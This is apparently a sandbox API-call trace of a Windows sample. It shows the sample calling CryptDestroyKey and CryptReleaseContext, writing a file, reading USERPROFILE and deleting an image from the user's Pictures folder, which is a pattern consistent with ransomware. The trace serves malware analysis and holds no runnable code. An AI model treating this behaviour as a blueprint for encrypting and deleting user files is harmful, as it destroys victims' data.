[0212.049] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.049] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.049] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.049] WriteFile (in: hFile=0x504, lpBuffer=0x2a8a938*, nNumberOfBytesToWrite=0x5760, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8a938*, lpNumberOfBytesWritten=0x8cf5e4*=0x5760, lpOverlapped=0x0) returned 1 [0212.050] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.050] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.050] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0212.050] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.050] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0212.050] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.050] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.050] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.051] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.051] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.051] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.051] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.051] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0212.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaae70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0212.051] CryptDestroyKey (hKey=0x9e2138) returned 1 [0212.051] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.051] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.051] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.051] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.051] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.051] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.051] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.051] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.051] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.051] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.051] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.055] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.055] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.055] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.055] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.055] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.055] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.056] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.056] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.056] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.056] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.056] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.056] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.056] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.056] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.056] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.056] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.056] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.056] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.056] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.056] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.056] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.056] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.056] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.056] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.056] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.056] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.056] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.056] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.056] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.056] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.056] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.057] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.057] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.057] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.057] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.057] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.057] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.057] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.057] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.060] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.060] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0212.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0212.060] CryptReleaseContext (hProv=0xa7caa0, dwFlags=0x0) returned 1 [0212.060] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.060] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.060] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.060] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.060] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.060] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.061] FreeLibrary (hLibModule=0x76390000) returned 1 [0212.061] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.061] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.061] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.061] CloseHandle (hObject=0x4f4) returned 1 [0212.062] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.062] CloseHandle (hObject=0x504) returned 1 [0212.064] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.064] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.064] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0212.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0212.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0212.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0212.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa570 [0212.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.064] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0212.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0212.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0212.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0212.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0212.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0212.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0212.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0212.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0212.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0212.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0212.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0212.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0212.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0212.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0212.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0212.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0212.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0212.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0212.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0212.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x62) returned 0x29f7900 [0212.065] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Y1E-1EvHMk4d A6QVp8.png", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Y1E-1EvHMk4d A6QVp8.png", lpFilePart=0x8cedf4*="Y1E-1EvHMk4d A6QVp8.png") returned 0x30 [0212.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7900 | out: hHeap=0x2af0000) returned 1 [0212.065] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Y1E-1EvHMk4d A6QVp8.png" (normalized: "c:\\users\\fd1hvy\\pictures\\y1e-1evhmk4d a6qvp8.png")) returned 0x20 [0212.065] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Y1E-1EvHMk4d A6QVp8.png", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf19ccb10, ftCreationTime.dwHighDateTime=0x1d5d5b1, ftLastAccessTime.dwLowDateTime=0x886c4fc0, ftLastAccessTime.dwHighDateTime=0x1d5d21a, ftLastWriteTime.dwLowDateTime=0x886c4fc0, ftLastWriteTime.dwHighDateTime=0x1d5d21a, nFileSizeHigh=0x0, nFileSizeLow=0x575e, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Y1E-1EvHMk4d A6QVp8.png", cAlternateFileName="Y1E-1E~1.PNG")) returned 0x9e2078 [0212.066] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Y1E-1EvHMk4d A6QVp8.png" (normalized: "c:\\users\\fd1hvy\\pictures\\y1e-1evhmk4d a6qvp8.png")) returned 1 [0212.069] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf19ccb10, ftCreationTime.dwHighDateTime=0x1d5d5b1, ftLastAccessTime.dwLowDateTime=0x886c4fc0, ftLastAccessTime.dwHighDateTime=0x1d5d21a, ftLastWriteTime.dwLowDateTime=0x886c4fc0, ftLastWriteTime.dwHighDateTime=0x1d5d21a, nFileSizeHigh=0x0, nFileSizeLow=0x575e, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Y1E-1EvHMk4d A6QVp8.png", cAlternateFileName="Y1E-1E~1.PNG")) returned 0 [0212.069] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0212.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0212.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0212.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0212.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0212.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0212.070] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0212.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0212.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0212.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0212.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0212.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0212.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0212.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0212.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0212.070] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0212.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0212.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6c0 [0212.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0212.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa768 [0212.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0212.070] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0212.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0212.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0212.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0212.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0212.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0212.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0212.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0212.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0212.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0212.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0212.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0212.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0212.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0212.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0212.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0212.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0212.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0212.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0212.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0212.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.071] 